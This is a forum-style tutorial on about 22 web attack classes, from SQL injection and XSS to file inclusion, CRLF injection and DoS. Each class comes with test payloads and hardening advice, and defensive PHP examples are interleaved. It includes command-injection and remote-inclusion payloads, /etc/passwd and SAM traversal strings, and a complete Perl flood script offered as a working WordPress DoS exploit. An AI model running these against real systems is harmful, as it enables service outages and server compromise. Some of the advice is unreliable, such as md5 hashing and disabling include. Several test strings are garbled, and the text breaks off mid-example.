Most of Web Attacks

I will be explaining most of the web attacks here, so just pay attention.


1.)SQL injection

a)Description

SQL injection allows an attacker to execute SQL commands on the database server behind the application he is attacking.

b)Impact

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible not only to manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

c)Recommendation

Allow only a-zA-Z0-9 characters


d)Testing string/s

('), (/), (\), (#), ("), (--), (-), (*)

e)Response

200 OK, database error messages, redirection to another page
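As an added example (not code from the original post), here is the same user lookup built by string concatenation and as a PDO prepared statement, run against an in-memory SQLite table so it works offline; it assumes the pdo_sqlite extension is available, and the table and rows are constructed for the demo.

```php
<?php
// Added example: vulnerable concatenation beside a prepared statement,
// plus the a-zA-Z0-9 allow-list check recommended above.

function makeDb(): PDO {
    $db = new PDO('sqlite::memory:');   // assumes pdo_sqlite is installed
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)');
    // Constructed sample rows.
    $db->exec("INSERT INTO users (name, secret) VALUES ('alice', 's3cr3t-a'), ('bob', 's3cr3t-b')");
    return $db;
}

// Vulnerable: user input is pasted straight into the SQL text, so a quote
// in the input changes the query structure.
function findUserConcat(PDO $db, string $name): array {
    $sql = "SELECT name FROM users WHERE name = '" . $name . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Fixed: the value travels as a bound parameter and can never become syntax.
function findUserPrepared(PDO $db, string $name): array {
    $stmt = $db->prepare('SELECT name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Allow-list check matching the recommendation above (a-zA-Z0-9 only).
function isAlnumToken(string $s): bool {
    return preg_match('/\A[a-zA-Z0-9]+\z/', $s) === 1;
}

$db = makeDb();
// Constructed input built from the single-quote test string above.
$payload = "x' OR '1'='1";

echo "concat:    ", implode(',', findUserConcat($db, $payload)), "\n";
echo "prepared:  ", implode(',', findUserPrepared($db, $payload)), "\n";
echo "allowlist: ", var_export(isAlnumToken($payload), true), "\n";
```

The concatenated query returns every row, the prepared one returns nothing, and the allow-list rejects the input before it reaches the database at all.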



2.)Cross Site Scripting (XSS)

a)Description

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user.
Because a browser cannot know whether the script should be trusted or not, it executes the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.
It is abbreviated XSS rather than CSS because CSS already means "Cascading Style Sheets".

b)Impact

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating the user.
It is also possible to modify the content of the page presented to the user.

c)Recommendation

Allow only a-zA-Z0-9 characters, or in PHP use the htmlspecialchars() function on the output


d)Testing string/s

(), ([script]alert();[/script]), (), ()

e)Response

200 OK, a pop-up message with your cookies



3.)Cross site request forgery (CSRF)

a)Description

Cross-Site Request Forgeries (CSRF) are an almost opposite style of attack. Rather than exploiting the trust that a user has for a Web site, they exploit the trust that a Web site has for a user. In the case of the XSS attacks we just discussed, the user is the victim. In the case of CSRF, the user is an unknowing accomplice.

b)Impact

An attacker may put a link on a forum, and when someone clicks the link he will send a message to the forum server. This may cause a flood.

c)Recommendation

-Use the POST method instead of GET
-Request authorization
-Check the Referer header
-Make every request unique

d)Testing string/s




Subject:


Message:






This way the attacker will flood the server, and he could bypass firewall protection since the flooders would be people who don't know what they are doing.

e)Response

200 OK, successful redirection
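As an added example (not code from the original post), this is one way to implement the "every request has to be unique" recommendation together with the POST-only and Referer checks listed above: a per-session token that a forged link cannot know. It assumes the application has already called session_start(); the forum form fields and origin are constructed for the demo.

```php
<?php
// Added example: per-session CSRF token with constant-time comparison,
// plus the POST-only and Referer/Origin checks from the list above.
// $session stands in for $_SESSION so the demo runs from the command line.

const CSRF_KEY = 'csrf_token';

// Create the token once per session; it is unpredictable and not guessable
// from a link the attacker posts somewhere else.
function csrfToken(array &$session): string {
    if (empty($session[CSRF_KEY])) {
        $session[CSRF_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_KEY];
}

// Hidden field to embed in every state-changing form.
function csrfField(array &$session): string {
    return '<input type="hidden" name="' . CSRF_KEY . '" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Returns null when the request is acceptable, otherwise the reason to refuse it.
function csrfProblem(array $session, array $server, array $post, string $siteOrigin): ?string {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 'state changes must use POST';
    }
    $expected = $session[CSRF_KEY] ?? '';
    $given    = (string) ($post[CSRF_KEY] ?? '');
    if ($expected === '' || !hash_equals($expected, $given)) {
        return 'missing or wrong CSRF token';
    }
    // Referer/Origin is a secondary check: some clients omit it, so only a
    // present-but-foreign value is rejected here.
    $ref = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($ref !== '' && $ref !== $siteOrigin && strpos($ref, $siteOrigin . '/') !== 0) {
        return 'request came from another origin';
    }
    return null;
}

// Constructed demo: a forged post triggered by a link carries no valid token,
// while the genuine form (rendered with csrfField) does.
$session = [];
$field   = csrfField($session);
$server  = ['REQUEST_METHOD' => 'POST', 'HTTP_REFERER' => 'http://forum.example/post.php'];
$forged  = ['subject' => 'hi', 'message' => 'flood'];
$genuine = ['subject' => 'hi', 'message' => 'hello', CSRF_KEY => $session[CSRF_KEY]];

var_dump(csrfProblem($session, $server, $forged, 'http://forum.example'));
var_dump(csrfProblem($session, $server, $genuine, 'http://forum.example'));
```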



4.)PHP injection

a)Description

PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code.

b)Impact

Malicious users may inject PHP code which will be executed on the server side. It's possible to run system commands if the PHP interpreter allows system() or similar functions.

c)Recommendation

Allow only a-zA-Z0-9 characters and set php.ini as follows:

engine = off
register_globals = off
magic_quotes_gpc = off
magic_quotes_runtime = Off
magic_quotes_sybase = Off
session.use_trans_sid = off
session.use_only_cookies = 1
safe_mode = on
safe_mode_gid = Off
safe_mode_include_dir = Off
safe_mode_exec_dir = Off
allow_url_fopen = off
open_basedir = '/home/sheib/public_html/unsafe' ;edit this
file_uploads = off
display_errors = off
log_errors = on
expose_php = off
error_reporting = E_ALL
session.save_path ="/tmp" ;edit this if you want
post_max_size = 8M
disable_functions = exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec, fsockopen, pfsockopen, socket_bind, socket_accept, socket_listen, socket_create, stream_socket_client, stream_socket_server, dl, glob, posix, include, include_once, require, require_once, fopen, readfile, file, imagecreatefromXXX, phpinfo, eval, chroot, suexec, Limits

*addslashes/stripslashes/magic_quotes_gpc won't help much
*When sending data use $_GET/$_POST, and for authentication $_SESSION, instead of register_globals
*Don't count on encoding functions like urlencode or base64_encode as if they were encryption; use md5 hashing


d)Testing string/s

(), (system(base64_decode(YWRtaW4=) #admin), ('.passthru($_GET[cmd]).'&cmd=id), (phpinfo())

e)Response

200 OK, test, admin, uid...



5.)PERL injection

a)Description

Perl injection is the same as PHP injection; the only difference is that the injected code is Perl rather than PHP.

b)Impact

Malicious users may inject perl code which will be executed on the server side.

c)Recommendation

Allow only a-zA-Z0-9 characters and use no warnings;

d)Testing string/s

(perl -e system(ipconfig)), (perl -e exec(ipconfig)), (perl -e \'print 'foo'\)

e)Response

200 OK, Windows IP Configuration, foo



6.)Path disclosure

a)Description

The page contains an error message that discloses the installation path and other data.

b)Impact

A remote user can determine the full path to the web root directory and other potentially sensitive information.

c)Recommendation

Allow only a-zA-Z0-9 characters and turn off the display of error messages (how depends on the script)

d)References

http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm

e)Testing string/s

(/), (\)

f)Response

200 OK, Warning message



7.)ASP injection

a)Description

ASP injection is the same as PHP or Perl injection; the only difference is that the injected code is ASP rather than PHP/Perl.

*Note*
ASP injection is possible only on Windows machines running IIS

b)Impact

Malicious users may inject asp code which will be executed on the server side.

c)Recommendation

Allow only a-zA-Z0-9 characters and disable the following procedures:

sp_makewebtask
xp_startmail
xp_sendmail
xp_cmdshell
xp_regwrite

d)Testing string/s

(<%@ LANGUAGE = 'JScript' %> <% Response.Write('Test'); %>;)

e)Response

200 OK, Test



8.)Source code disclosure

a)Description

It is possible to read the source code of a script by passing the script's own filename as a parameter. The script includes a file whose name is determined by user-supplied data, and this data is not properly validated before being passed to the include function.

b)Impact

An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks.

c)Recommendation

Analyse the source code of this script and solve the problem.

d)References

http://www.imperva.com/application_defense...disclosure.html -> "Source Code Disclosure" by Imperva

e)Testing string/s

request the file itself

f)Response

200 OK



8.)Server side includes (SSI)

a)Description

Server Side Includes or SSI is an easy server-side scripting language used almost exclusively for the web. As its name implies, its primary use is including the contents of a file into another, via a Web Server.

SSI is primarily used to "paste" the contents of one or more files into another. For example, a file (of any type, .htm, .txt, etc.) containing a daily quote, could be included into multiple SSI Enabled pages throughout a website, by placing the following code into the desired pages. With one change of the quote.txt file, pages including the snippet will display the latest daily quote. Server Side Includes are useful for including a common piece of code throughout a site, such as a navigation menu.

In order for a web server to recognise an SSI-enabled HTML file and therefore carry out these instructions, the file must end with the .shtml extension. SSI files can also end with .shtm, but this depends on the server's ability to recognise the extension.

b)Impact

An attacker can execute commands on the server

c)Recommendation

Turn off SSI

d)References

http://en.wikipedia.org/wiki/Server_Side_Includes -> "Server Side Includes" by Wikipedia

e)Testing string/s




f)Response

200 OK, root, uid....



9.)Code execution

a)Description

Code execution vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself.

b)Impact

A malicious user may execute arbitrary system commands with the permissions of the web server.

c)Recommendation

*Allow only a-zA-Z0-9 characters
*Turn on safe_mode
*Disable exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec
*Set permissions so that only root can execute commands
*Use escapeshellcmd or escapeshellarg

d)References

http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
http://www.owasp.org/index.php/PHP_Top_5 -> "PHP Top 5" by Owasp

e)Testing string/s

(|id|), ($(id)), (; id), (| id), (&& id), (|| id), (> id), (<>

f)Response

200 OK, uid...



10.)File inclusion

a)Description

An attacker could include a remote or local file and execute commands on the server

b)Impact

It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver.

c)Recommendation

*allow_url_fopen = off
*Use the file_exists() function to check that the file is valid before including it
*Disable user control over the included file name


d)References

http://www.php.net/manual/en/features.remote-files.php -> "Using remote files"
http://www.theserverpages.com/10101/21/ -> "Code Injection Vulnerabilities Explained" by The Server Pages
http://www.owasp.org/index.php/PHP_Top_5 -> "PHP Top 5" by Owasp

e)Testing string/s

(http://site.domain/include/test.php), (/file.php)

Where test.php contains:

<?php
$t=system('id');
echo "$t";
?>

f)Response

200 OK, uid....


11.)Directory Traversal

a)Description

Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

b)Impact

By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.

c)Recommendation

*Allow only a-zA-Z0-9 characters
*Set open_basedir
*Set display_errors to off

d)References

http://www.acunetix.com/websitesecurity/di...y-traversal.htm -> "Directory Traversal Attacks" by Acunetix
http://bg.php.net/features.safe-mode -> "Security and Safe Mode"
http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
http://en.wikipedia.org/wiki/Directory_traversal -> "Directory traversal" by Wikipedia
http://www.imperva.com/application_defense..._traversal.html -> "Directory Traversal" by Imperva
http://cert.uni-stuttgart.de/archive/vulnw...2/msg00007.html -> "phpBB Attachment Mod Directory Traversal HTTP POST Injection" by Paul Laudanski

e)Testing string/s

(../), (../../../../../../../../etc/passwd)

f)Response

200 OK, directory listing, root
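As an added example covering both the file inclusion and the directory traversal sections (not code from the original post), here are two checks that keep a user-supplied name from escaping the include directory or pulling in a remote URL. One caveat the list above does not state: file_exists() on its own is not a defence, since file_exists('/etc/passwd') is true. The page names, base directory and test strings are constructed for the demo.

```php
<?php
// Added example: an allow-list lookup and a canonical-path check for include().

// 1) Allow-list: map a short token to a known file; anything else is refused.
const PAGES = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];

function pageFromAllowList(string $param): ?string {
    return PAGES[$param] ?? null;
}

// 2) Canonical-path check: resolve the path and require it to stay under $base.
function safePathUnder(string $base, string $userPath): ?string {
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // Reject remote wrappers (http://, ftp://, php://, ...) before touching the filesystem.
    if (preg_match('#\A[a-z][a-z0-9+.\-]*://#i', $userPath)) {
        return null;
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null;                       // does not exist
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // "../" escaped the base directory
    }
    return $candidate;
}

// Constructed demo directory holding one legitimate include.
$base = sys_get_temp_dir() . '/inc_demo_' . bin2hex(random_bytes(4));
mkdir($base);
file_put_contents($base . '/home.php', "<?php echo 'home';");

$tests = [
    'home.php',
    '../../../../../../../../etc/passwd',     // the traversal test string above
    'http://site.domain/include/test.php',   // the remote inclusion test string above
];
foreach ($tests as $t) {
    $r = safePathUnder($base, $t);
    printf("%-42s => %s\n", $t, $r === null ? 'REFUSED' : 'ok');
}
var_dump(pageFromAllowList('home'), pageFromAllowList('../etc/passwd'));

unlink($base . '/home.php');
rmdir($base);
```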



12.)Cross Frame scripting (XFS)

a)Description

This is an attack technique used to trick a user into thinking that fake web site content is legitimate data.

b)Impact

Malicious users may poison a frame allowing them to conduct phishing attacks.

c)Recommendation

Allow only a-zA-Z0-9 characters and verify the data sent by the user

d)References

http://www.nextgenss.com/papers/NISR-WP-Phishing.pdf -> "The Phishing Guide" by Gunter Ollmann

e)Testing string/s

http://your-page.com/grab_data.php

f)Response

200 OK, http://your-page.com/grab_data.php



13.)CGI security checks

a)Description

CGI security checks are used to see if the Common Gateway Interface of a site is vulnerable to old/new bugs

b)Impact

Malicious users may execute commands or do something else depending on the bug

c)Recommendation

Keep your server and software updated

d)References

http://www.w3.org/Security/faq/wwwsf4.html -> "CGI script security" by Lincoln D. Stein and John N. Stewart
http://www.mirrors.wiretapped.net/security...ng/safe-cgi.txt -> "Safe CGI Programming" by Paul Phillips
http://bau2.uibk.ac.at/matic/cgi2.htm -> "CGI security holes" by Jennifer Myers

e)Testing string/s

/.%252e/.%252e/.%252e/winnt/repair/sam._
/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._

f)Response

200 OK



14.)Cookie attacks

a)Description

By injecting a custom HTTP header or by injecting a META tag it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.

b)Impact

By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

c)Recommendation

You need to filter the output in order to prevent the injection of custom HTTP headers or META tags.
Additionally, with each login the application should provide a new session ID to the user.

d)References

http://www.acros.si/papers/session_fixation.pdf -> "Session Fixation Vulnerability In Web-based Applications" by Mitja Kolsek
http://www.webappsec.org/projects/threat/c..._fixation.shtml -> "Session Fixation" by Web Application Security Consortium
http://www.php.net/session -> "Session Handling Functions"
http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf -> "Hacking Web Applications Using Cookie Poisoning" by Amit Klein
http://www.securityfocus.com/infocus/1722 -> "Penetration Testing for Web Applications (Part Three)" by Jody Melbourne and David Jorm

e)Testing string/s

(Set-Cookie: cookiename=cookievalue) ()

f)Response

200 OK, new cookie that contains your data



15.)Http response splitting/CRLF injection

a)Description

HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.

b)Impact

It is possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies, spoof mail headers or execute HTML code. This may lead to vulnerabilities like XSS (cross-site scripting) or session fixation.

c)Recommendation

You need to strip CR (ASCII 13, \r) and LF (ASCII 10, \n) from the user input, or properly encode the output, in order to prevent the injection of custom HTTP headers.

d)References

http://www.acunetix.com/websitesecurity/crlf-injection.htm -> "CRLF Injection Attack" by Acunetix
http://www.cgisecurity.com/lib/crlf-injection.txt -> "CRLF Injection" by Ulf Harnhammar
http://packetstormsecurity.org/papers/gene...ttpresponse.pdf -> "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html -> "Introduction to HTTP Response Splitting" by dcrab
http://www.cgisecurity.com/papers/header-b...xploitation.txt -> "Header Based Exploitation: Web Statistical Software Threats" by Cgisecurity
http://www.cgisecurity.com/lib/bill/Willia...llamy_GCIH.html -> "TCP Port 80 - HyperText Transfer Protocol (HTTP) Header Exploitation" by William Bellamy Jr.

e)Testing string/s

http://localhost/mail.php?from=foo@foo.com...;message=moofoo

Where our headers will look like:

CC: foo@foo.com
Bcc: foo@foo.com

And if we change our url to

http://localhost/mail.php?from=foo@foo.com&to=mail1, mail2, mail3\r\n&subject=foo&message=moofoo

then we have just performed a mail spoofing attack.

f)Response

200 OK, changed headers, redirection to another page
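As an added example for this section and for the cookie attacks section above (not code from the original post), this is a header-value check for the mail.php scenario: the `from` value is validated before it is placed in a header, and the same CR/LF rule is applied to a Set-Cookie the application emits itself. It assumes PHP 7.3+ for the setcookie() options array; the inputs are constructed from the URL above.

```php
<?php
// Added example: refuse CR/LF (raw or URL-encoded) in anything that becomes
// an HTTP or mail header, and only build headers from validated values.

// True when the value contains a carriage return or line feed.
function hasCrlf(string $value): bool {
    return preg_match("/[\r\n]/", $value) === 1;
}

// Returns a single bare e-mail address, or null if the input is not one.
function cleanAddress(string $input): ?string {
    // Decode once so %0d%0a smuggled through a proxy is caught as well.
    if (hasCrlf($input) || hasCrlf(rawurldecode($input))) {
        return null;
    }
    $addr = filter_var(trim($input), FILTER_VALIDATE_EMAIL);
    return $addr === false ? null : $addr;
}

// Extra headers for mail(), built only from a validated address.
function buildMailHeaders(string $fromInput): ?string {
    $from = cleanAddress($fromInput);
    if ($from === null) {
        return null;
    }
    return "From: $from\r\nReply-To: $from";
}

// Same rule for a cookie the application sets: no CR/LF in name or value.
function safeSetCookie(string $name, string $value): bool {
    if (hasCrlf($name) || hasCrlf($value) || !preg_match('/\A[A-Za-z0-9_\-]+\z/', $name)) {
        return false;
    }
    if (!headers_sent()) {
        setcookie($name, $value, ['httponly' => true, 'samesite' => 'Lax']);
    }
    return true;
}

// Constructed inputs: the legitimate address, the injected one from the URL
// above, and the same injection URL-encoded.
$inputs = [
    'foo@foo.com',
    "foo@foo.com\r\nBcc: mail1, mail2, mail3",
    'foo@foo.com%0d%0aBcc:someone@example.invalid',
];
foreach ($inputs as $in) {
    $h = buildMailHeaders($in);
    echo json_encode($in), ' => ', $h === null ? 'REFUSED' : json_encode($h), "\n";
}
var_dump(safeSetCookie("sid\r\nSet-Cookie: admin=1", 'x'));
```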



16.)Buffer overflow

a)Description

It is almost impossible to find a buffer overflow in a web application today, but there are still some scripts that use C/C++/C# code.

b)Impact

An attacker could execute commands on the server and even get root privileges

c)Recommendation

Analyse the source code of your C/C++/C# program and fix all possible overflows

*For Microsoft Visual C++ .NET you can use /GS (Buffer Security Check) when compiling to detect possible overflows, and /Gs (Control Stack Checking Calls), but be careful when using /Gs

d)References

http://www.whitehatsec.com/articles/mythbu...er_overflow.pdf -> "Myth-Busting Web Application Buffer Overflows" by Jeremiah Grossman
http://en.wikipedia.org/wiki/Buffer_overflow -> "Buffer overflow" by Wikipedia

e)Testing string/s

http://webserver/foo.cgi?param1=AAAAAAAAAAAAAAAAA... 5000 A's

f)Response

500 Internal Server Error, 0x41414141 or something similar



17.)Format String

a)Description

Format string attacks are a new class of vulnerabilities discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf()

b)Impact

A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * .

c)Recommendation

Analyse the source code of your C/C++/C# program and fix every place where user input is used as a format string

d)References

http://www.webappsec.org/projects/threat/c...ng_attack.shtml -> "Format String Attack" by Web Application Security Consortium
http://en.wikipedia.org/wiki/Format_string_attack -> "Format string attack" by Wikipedia

e)Testing string/s

(%f), (%p), (%n)

http://server/foo.cgi?param1=AAAA%x%x%x%x%x%x%x%x

f)Response

Error message, something like 0x0804960c and so on...



18.)Integer Overflow

a)Description

In computer programming, an integer overflow is an anomalous condition which may cause a buffer overflow, resulting in a computer security risk where adjacent, valid program control data may be overwritten, permitting the execution of arbitrary, and potentially harmful code.

b)Impact

A malicious user may create a buffer overflow condition and execute commands on the server

c)Recommendation

Analyse the source code of your C/C++/C# program and fix all possible overflows

d)References

http://www.phrack.org/phrack/60/p60-0x0a.txt -> "Basic Integer Overflows" by blexim
http://en.wikipedia.org/wiki/Integer_overflow -> "Integer overflow" by Wikipedia

e)Testing string/s

http://server/foo.cgi?param1=35 65535

f)Response

Error message, something like 0x0000ffff and so on...



19.)LDAP Injection

a)Description

Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating X.500 directory services. When a web application fails to properly sanitize user-supplied input, it is possible for an attacker to alter the construction of an LDAP statement.

b)Impact

When an attacker is able to modify an LDAP statement, the process will run with the same permissions as the component that executed the command. (e.g. Database server, Web application server, Web server, etc.). This can cause serious security problems where the permissions grant the rights to query, modify or remove anything inside the LDAP tree.

c)Recommendation

Allow only a-zA-Z0-9 characters

d)References

http://en.wikipedia.org/wiki/LDAP -> "Lightweight Directory Access Protocol" by Wikipedia
http://www.webappsec.org/projects/threat/c...injection.shtml -> "LDAP Injection" by Web Application Security Consortium
http://www.spidynamics.com/whitepapers/LDAPinjection.pdf -> "LDAP Injection" by Sacha Faust
http://www.ietf.org/rfc/rfc1960.txt -> "A String Representation of LDAP Search Filters" by Tim Howes
http://ldapman.org/ -> LDAP resources

e)Testing string/s

()), (*)

f)Response

Redirection, error message containing information



20.)XPath Injection

a)Description

XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

b)Impact

An unauthenticated attacker may extract a complete XML document using XPath querying. This may compromise the integrity of your database and expose sensitive information.

c)Recommendation

Allow only a-zA-Z0-9 characters

d)References

http://palisade.paladion.net/issues/2005Jul/xpath-injection/ -> "XPath injection in XML databases" by Runa Dwibedi
http://www.webappsec.org/projects/threat/c...injection.shtml -> "XPath Injection" by Web Application Security Consortium
http://www.w3.org/TR/xpath -> "XML Path Language (XPath)" by W3C
http://arxiv.org/PS_cache/cs/pdf/0210/0210026.pdf -> "Encoding a Taxonomy of Web Attacks with Different-Length Vectors" by Gonzalo Alvarez and Slobodan Petrovic
http://packetstormsecurity.org/papers/bypa...on_20040518.pdf -> "Blind XPath Injection" by Amit Klein

e)Testing string/s

('), (/), (\), (#), (") (--), (-), (*)

f)Response

Full content of XML document



21.)URL redirection

a)Description

URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting.

b)Impact

A remote attacker can redirect users from your website to a URL of his choice. This may assist an attacker in conducting phishing attacks, trojan distribution or spamming.

c)Recommendation

Your script should properly sanitize user input.

d)References

http://www.nist.org/news.php?extend.147 -> "Google can be Exploited to Assist Phishing Attacks" by NIST IT SECURITY

e)Testing string/s

('), (/), (\), (#), ("), (--), (-), (*)

f)Response

200 OK, redirection to another page



22.)Web Application DoS

a)Description

Web application DoS (Denial of Service) is an attack that sends multiple very large requests to a server.

b)Impact

Computer crash, service crash, SQL crash

c)Recommendation

Preventing DoS, on web applications and elsewhere, isn't that hard, but protecting against DDoS (Distributed Denial Of Service) is impossible. Anyway, here are some tips:

*Use POST instead of GET
*Make a function that will stop multiple POST/GET requests to your site from the same user. If a user makes a request 3-4 times, block his IP from requesting anything on your site for 5-10 minutes and log the IP
*POST requests should not be longer than 8 MB
*When specifying a maxsize value, be sure to add a server-side check so that the attacker can't make the request longer than it

d)References

http://en.wikipedia.org/wiki/Denial-of-service_attack -> "Denial-of-service attack" by Wikipedia
http://www.cert.org/tech_tips/denial_of_service.html -> "Denial of Service Attacks" by CERT
http://cnscenter.future.co.kr/resource/sec...DoS_attacks.pdf -> "Application Denial of Service (DOS) Attacks" by Stephen de Vries
http://www.lasr.cs.ucla.edu/ddos/404_mirkovic_j.pdf -> "Attacking DDoS at the Source" by Jelena Mirkovic, Gregory Prier and Peter Reiher

e)Testing string/s

Here is my WordPress crash exploit:

#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev
#The exploit was tested on 10 machines but not all got flooded. Only 6/10 got crashed

use Socket;

if (@ARGV <>

$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999;
{
$user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
$len = length $data;
$foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";

my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+";
}

#s33 if the server is down
print "\n\n";
system("ping $host");

sub usage {

print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /woredpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};

#Wordpress answer:
#A) DOS shouldn't be handled by a PHP application, there are much more efficient and better ways to deal with this. B) Registration is off by default, so the severity of this sort of DOS is rather low.
#Well, I like giving my own patches or security solutions when I find a bug, but this time I agree with the WordPress developers

f)Response

Server crash, service crash, almost impossible to move your mouse
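As an added example (not code from the original post), here is the per-client limiter described in the recommendation above: more than N hits inside a window blocks the address for M minutes and logs it, with a Content-Length guard for the 8 MB rule. It assumes PHP 8; state is kept in an array here, whereas a real deployment would keep it in shared storage (a database or cache) because every PHP request starts fresh.

```php
<?php
// Added example: sliding-window request limiter plus a request-size guard.

class RequestLimiter {
    private array $hits = [];          // ip => list of timestamps inside the window
    private array $blockedUntil = [];  // ip => unix time the block expires
    private array $log = [];

    public function __construct(
        private int $maxHits = 4,
        private int $windowSec = 60,
        private int $blockSec = 600    // 10 minutes
    ) {}

    // True when the request may proceed, false when it must be refused.
    public function allow(string $ip, int $now): bool {
        if (($this->blockedUntil[$ip] ?? 0) > $now) {
            return false;
        }
        $recent = array_filter($this->hits[$ip] ?? [], fn ($t) => $t > $now - $this->windowSec);
        $recent[] = $now;
        $this->hits[$ip] = array_values($recent);
        if (count($recent) > $this->maxHits) {
            $this->blockedUntil[$ip] = $now + $this->blockSec;
            $this->log[] = sprintf('%s blocked at %d after %d hits', $ip, $now, count($recent));
            unset($this->hits[$ip]);
            return false;
        }
        return true;
    }

    public function log(): array { return $this->log; }
}

// Content-Length guard matching the "not longer than 8 MB" rule above.
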